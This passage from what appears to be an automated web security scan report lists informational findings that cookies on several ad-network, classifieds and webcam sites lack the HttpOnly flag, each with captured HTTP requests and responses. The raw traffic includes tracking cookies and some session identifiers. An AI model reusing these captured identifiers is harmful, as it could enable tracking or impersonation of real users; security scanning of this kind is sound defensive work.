The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

11.290. http://cbs6albany.oodle.com/pro/fb-follow/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cbs6albany.oodle.com
Path:	/pro/fb-follow/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyNTM7fQ%3D%3D; path=/; domain=.oodle.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.291. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.292. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/951/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2884195688
Cache-Control: max-age=2286960
Expires: Thu, 24 Feb 2011 16:41:30 GMT
Date: Sat, 29 Jan 2011 05:25:30 GMT
Connection: close

11.293. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.294. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.295. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.296. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.297. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.298. http://d7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.299. http://de.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=02b46df6-422e-4d35-8928-ba18aa43474c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.300. http://de.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=9684388a-c5c4-42d8-b5e6-c1e641451a87&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KxmFzWluv%2bqbh0c3oiJmLUSD%2bKjuVH%2fV%2fFOKPYPY2Il6OwS7pKLUz42XL5yLZkKZLHLspvyKtn%2bTkr%2f9rrIzLtQ%3d%3d; path=/
pde=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:00 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rkmzysyclwgu53fp4rzbprzh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rkmzysyclwgu53fp4rzbprzh; path=/; HttpOnly
Set-Cookie: spvdr=vd=9684388a-c5c4-42d8-b5e6-c1e641451a87&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KxmFzWluv%2bqbh0c3oiJmLUSD%2bKjuVH%2fV%2fFOKPYPY2Il6OwS7pKLUz42XL5yLZkKZLHLspvyKtn%2bTkr%2f9rrIzLtQ%3d%3d; path=/
Set-Cookie: pde=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:00 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.301. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.302. http://dk.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=6b4ad7c2-4fe9-446c-bd92-1540c020264b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:06 GMT; path=/
idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.303. http://dk.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=4e212482-52e8-4a45-bf18-fce81b449003&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pdk=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:07 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wylfhkil3zhhhp45ddkune3b; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wylfhkil3zhhhp45ddkune3b; path=/; HttpOnly
Set-Cookie: spvdr=vd=4e212482-52e8-4a45-bf18-fce81b449003&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pdk=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:07 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.304. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11170717655@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11170717655@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.305. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11370845975@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11370845975@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.306. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.307. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2455
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

11.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
